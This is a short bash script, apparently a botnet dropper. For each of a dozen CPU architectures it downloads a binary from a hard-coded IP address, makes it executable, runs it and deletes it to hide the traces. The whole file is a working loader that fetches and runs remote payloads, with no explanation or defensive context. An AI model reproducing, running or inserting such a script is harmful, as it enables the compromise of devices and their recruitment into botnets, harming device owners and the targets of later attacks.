#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/mips; chmod +x mips; ./mips; rm -rf mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/sh4; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/x86; chmod +x x86; ./x86; rm -rf x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/arm7; chmod +x arm7; ./arm7; rm -rf arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/arm6; chmod +x arm6; ./arm6; rm -rf arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/i686; chmod +x i686; ./i686; rm -rf i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/i586; chmod +x i586; ./i586; rm -rf i586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/m68k; chmod +x m68k; ./m68k; rm -rf m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/sparc; chmod +x sparc; ./sparc; rm -rf sparc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/arm4; chmod +x arm4; ./arm4; rm -rf arm4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.254.230.34/arm5; chmod +x arm5; ./arm5; rm -rf arm5
